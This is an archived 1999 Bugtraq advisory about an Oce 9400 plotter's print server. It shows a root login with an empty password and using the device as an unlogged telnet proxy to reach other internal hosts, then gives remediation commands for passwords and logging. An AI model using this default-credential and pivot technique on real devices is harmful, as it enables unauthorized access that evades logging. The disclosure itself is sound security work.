This appeared on bugtraq in August of 99 I am aware of the Intelligent Peripherals bulletin by CIAC. http://www.ciac.org/ciac/bulletins/j-019.shtml I have a few plotters / printers under my audit umbrella and noticed something interesting on an Oce' 9400 plotter. The printer has the ability to be a telnet proxy. Where as a user can hop via telnet to other hosts. If the printer is not setup properly the connections will go unlogged. bunyip% telnet JPP1 Trying 192.168.38.244... Connected to JPP1. Escape character is '^]'. Network Printer Server Version 5.6.3 (192.168.38.244) login: root Password:[Just enter here] Welcome root user WARNING: current and stored values differ. Use 'list diff' command to find the differences. Current values will be lost if unit is reset. 192.168.38.244:root> telnet 192.168.38.110 trying 192.168.38.110 ... Connected to 192.168.38.110 Escape character is '0x18' Red Hat Linux release 5.9 (Starbuck) Kernel 2.2.3-5 on an i586 login: 192.168.38.244:root> list sysinfo name: contact: location: version: 5.6.3 serial number: 13029 compiled: Mar 25 1998 loginfo: sys logport: syslog: 255.255.255.255 email: NetPrint@ dns server: 192.168.38.110 module: novell, appletalk, netbios checksum: 1E54 All that is needed is a valid DNS server setup in the plotter configuration. 192.168.38.244:root> set sysinfo dns 192.168.38.100 And anyone can use the plotter as an anonymous telnet proxy. Fix: Enable passwords for the accounts on the plotter: syntax: set user add set user del set user passwd [] set user type root|guest set user from default|stored Enable logging: syntax: set logpath name set logpath type [[-]job] [[-]user] [[-]pgcnt] [[-]cksum] [[-]printer] [[-]ioport] set logpath port |email|syslog set logpath from default|stored Larry W. Cashdollar http://vapid.dhs.org lwc@vapid.dhs.org